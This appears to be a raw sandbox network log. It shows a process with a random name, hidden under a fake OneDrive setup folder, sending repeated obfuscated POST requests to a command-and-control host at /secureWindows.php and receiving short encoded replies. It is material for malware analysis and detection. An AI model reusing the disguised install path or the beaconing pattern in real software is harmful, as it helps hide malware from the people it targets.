                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:11.595199108 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:11.949229956 CET | 1076 | OUT | Data Raw: 57 55 59 55 55 59 53 57 58 57 50 59 55 51 5b 5c 54 5a 5c 5e 59 5c 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WUYUUYSWXWPYUQ[\TZ\^Y\Z^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8#.=+.X$-8-5$]%=3,9<Z4(&)/<5=\$86- F$,Z*
                                                        Oct 30, 2024 05:23:12.213474035 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:12.412559986 CET | 780 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNOQPRyYMKROXWWdyRG8qmbP8inB%2B1AyRtI3b9GcHEDAeoEutsSSpWXBMWqqxpYn6puZ733NF9wBLA89MJPvXbUESZ7PyWhxxkI9l7%2FUJEg0Dl55iMSIc9vGu4CQ3pomaG%2F39iH0MWI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0ecfcf52cb6-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1789&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=822260&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:12.412611961 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        76 | 192.168.2.4 | 49894 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:13.586055994 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:13.933445930 CET | 1076 | OUT | Data Raw: 52 54 5c 51 50 5a 56 52 58 57 50 59 55 51 5b 5e 54 58 5c 5f 59 5c 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\QPZVRXWPYUQ[^TX\_Y\ZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&80X((&0?C:%+1Y8;729<<&5]&;%X/* F$,Z*
                                                        Oct 30, 2024 05:23:14.184196949 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:14.383826017 CET | 783 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gYY0qV16MMSgr%2BrgY6tyQJEfTvKS%2FbOj0h1jww0iAWLnWIytR1Nr5YGWIIm7sHFheUiHerQQ8cLW7WfiLloUZpdeozhDwffcFfvTIzS2pKECqoQBEpQF1eb2Q1IVnEnGqbVNXDtBJfY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0f949b0467e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=905000&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        77 | 192.168.2.4 | 49901 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:14.513708115 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:14.870879889 CET | 1076 | OUT | Data Raw: 57 5e 59 52 55 55 53 56 58 57 50 59 55 5a 5b 59 54 58 5c 55 59 57 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YRUUSVXWPYUZ[YTX\UYWZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&, +^2':%%[<-* [79;]%:<+653(5Z-* F$,Z*-
                                                        Oct 30, 2024 05:23:15.111637115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:15.310664892 CET | 794 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zwDC2BoLnuSP5NLs8y0529V0U1xlUSvkiBozNLKjCXP8fWp0GN3IjAj6q%2FD8KZiSr5ZPqQ7Ft%2BO6Z7y%2FpNjvl9LAuXr8GdF%2FFigZNX6DCgvY%2BCYJrpe0AEy%2FvUJ4%2BIU04rvKgpDd79k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0ff1abd2e64-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1353271&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        78 | 192.168.2.4 | 49907 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:15.437074900 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:15.792754889 CET | 1076 | OUT | Data Raw: 57 53 5c 56 50 5d 56 57 58 57 50 59 55 5f 5b 5a 54 52 5c 5b 59 57 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\VP]VWXWPYU_[ZTR\[YWZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/1(3A:C<%=;,'4;2/(&!^0-* F$,Z*
                                                        Oct 30, 2024 05:23:16.053365946 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:16.254379988 CET | 791 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0R%2FPBFMe9xOoNpSxVnKEDyNqqc1Z3OKYG0Vn50I04f2WFQxLI2k6rLt%2FEfOcwuAcpQF05rucY%2B%2BbODiUHB1nx6lW7576bWGiyfcrh%2ByFZv%2FGsRHdYHMP4O7XhLC0kP9v%2Fa%2FcQfoJus%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a104f9103165-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1337&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1099468&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:16.254405975 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        79 | 192.168.2.4 | 49913 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:16.376128912 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:16.730259895 CET | 1076 | OUT | Data Raw: 57 50 5c 55 50 58 53 51 58 57 50 59 55 5c 5b 5c 54 5f 5c 59 59 55 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\UPXSQXWPYU\[\T_\YYUZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;3:+^!08:0Z2=0^,8X#*?Z1<<'6.: F$,Z*5
                                                        Oct 30, 2024 05:23:16.983422995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:17.196800947 CET | 798 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dLjDsmWkZWzY1rFyX17ETe%2FW9wY%2BiqwShJKSqc4wNKb%2BwUtpoZs%2BDzBCXrnd%2BxBAF95GLn5%2BDAyCBa1tAYUh7Ro5pXliWTP6JztY2JKmtF5hy%2FXfcFQ%2FMhfepq7THD3AYFz5%2FmKRtBk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a10acb20e7cf-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1060029&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        80 | 192.168.2.4 | 49919 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:17.334767103 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        81 | 192.168.2.4 | 49923 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:17.569257975 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:17.919337034 CET | 1340 | OUT | Data Raw: 57 57 59 55 55 54 56 57 58 57 50 59 55 51 5b 52 54 5f 5c 5f 59 57 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WWYUUTVWXWPYUQ[RT_\_YWZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^-0&(*Z'.#95$-+;$4+Y1 <=[';*: F$,Z*
                                                        Oct 30, 2024 05:23:18.144242048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:18.474788904 CET | 941 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5poFtP%2B%2FHuMmx196dKUCjJxC7DvacFBeS6cvZnNwHqkKpuT2ZKCGWwYwg7wED7WI0YiLQCDdbRg8t%2Fw009HFjt0f1SZQuLoNs%2BTHN3cT%2B1k%2FtGyxHb47YFEa4i5rMw5KV9sxPqyBmU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1120f56e5b1-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1097&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1340740&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 56 2b 01 33 09 25 23 04 1e 2b 02 0f 5b 2a 3d 3a 58 33 1f 30 1b 32 3c 25 00 2b 15 33 12 29 1a 27 03 3c 22 0d 01 21 35 34 58 29 01 2f 46 0c 10 27 12 30 0c 3b 53 28 55 2d 5c 3e 2b 27 59 22 20 3e 58 3e 5f 37 55 36 30 27 07 24 31 03 0b 3b 03 0b 0e 2d 1b 2e 5f 39 1d 09 0e 3d 00 21 57 08 14 22 5d 31 05 33 1b 27 3d 30 59 24 21 36 59 37 06 30 05 21 02 31 04 3f 2b 28 1e 26 20 38 5b 24 23 05 1e 26 2a 20 18 28 31 2c 08 32 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&V+3%#+[*=:X302<%+3)'<"!54X)/F'0;S(U-\>+'Y" >X>_7U60'$1;-._9=!W"]13'=0Y$!6Y70!1?+(& 8[$#&* (1,23"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        82 | 192.168.2.4 | 49925 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:17.702641964 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:18.058387995 CET | 1076 | OUT | Data Raw: 52 54 5c 56 55 54 56 56 58 57 50 59 55 5e 5b 5c 54 5c 5c 5b 59 53 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\VUTVVXWPYU^[\T\\[YSZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z-#&X(9'=E-51$_8:,"*%]+&6'+=Z- F$,Z*=
                                                        Oct 30, 2024 05:23:18.294241905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:18.482450962 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNP9ejwKa2x52TeTanBsNYANmae56gtyCQ03xGshd23IlN2kpsWxtzHGJwVx6kIwbcCviy7IrbGCanVD78%2FV8pdOS69iKAGv%2FA7Baszht8fuoQhd4WmOaAdynnwIjG%2Fi575axv5ltVM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a112f9da477f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1047&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1401742&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        83 | 192.168.2.4 | 49931 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:18.617172956 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:18.964659929 CET | 1076 | OUT | Data Raw: 52 57 5c 51 55 5f 56 56 58 57 50 59 55 59 5b 52 54 5e 5c 5c 59 55 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RW\QU_VVXWPYUY[RT^\\YUZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%],#%?;>Z3,:(]%=/8]#4%*3^?5'9:* F$,Z*!
                                                        Oct 30, 2024 05:23:19.211685896 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:19.511055946 CET | 798 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iN2%2FYuyjXK6BkUnsOuV3mq7osIlC%2BvI6U%2Bq5ATyXxDV2XgVWgaRK2cy%2FQlxBmsRT5bKdy9%2Btq3a0714J7A7vXDhAnWCYJBX0gecFCAnpU27qfvsZJh%2BJma%2FDnod%2F%2FuRs6yNu4Mk5dKY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a118be5c6bd8-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1226079&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        84 | 192.168.2.4 | 49937 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:19.647084951 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:19.995907068 CET | 1076 | OUT | Data Raw: 57 54 5c 52 55 5c 53 57 58 57 50 59 55 5c 5b 52 54 5b 5c 58 59 51 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WT\RU\SWXWPYU\[RT[\XYQZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^;?8>$#C,6?23/98#*/Y2/X<*$!9: F$,Z*5
                                                        Oct 30, 2024 05:23:20.241946936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:20.585885048 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FXdMYvmy6%2FHGtmvxv7ISmoXRCbbopLj6YY5aPso%2Fg3NSpa4hOxzL%2FyQW5r8QplLa6PAmM%2F9QWT6uMnMHJwC83argaNp21uQv2ErGetyJv1kz%2Fffcl84NllCMP29T1DflK5tDBqfNFwQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a11f2f626c2e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1308039&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:20.585978985 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        85 | 192.168.2.4 | 49944 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
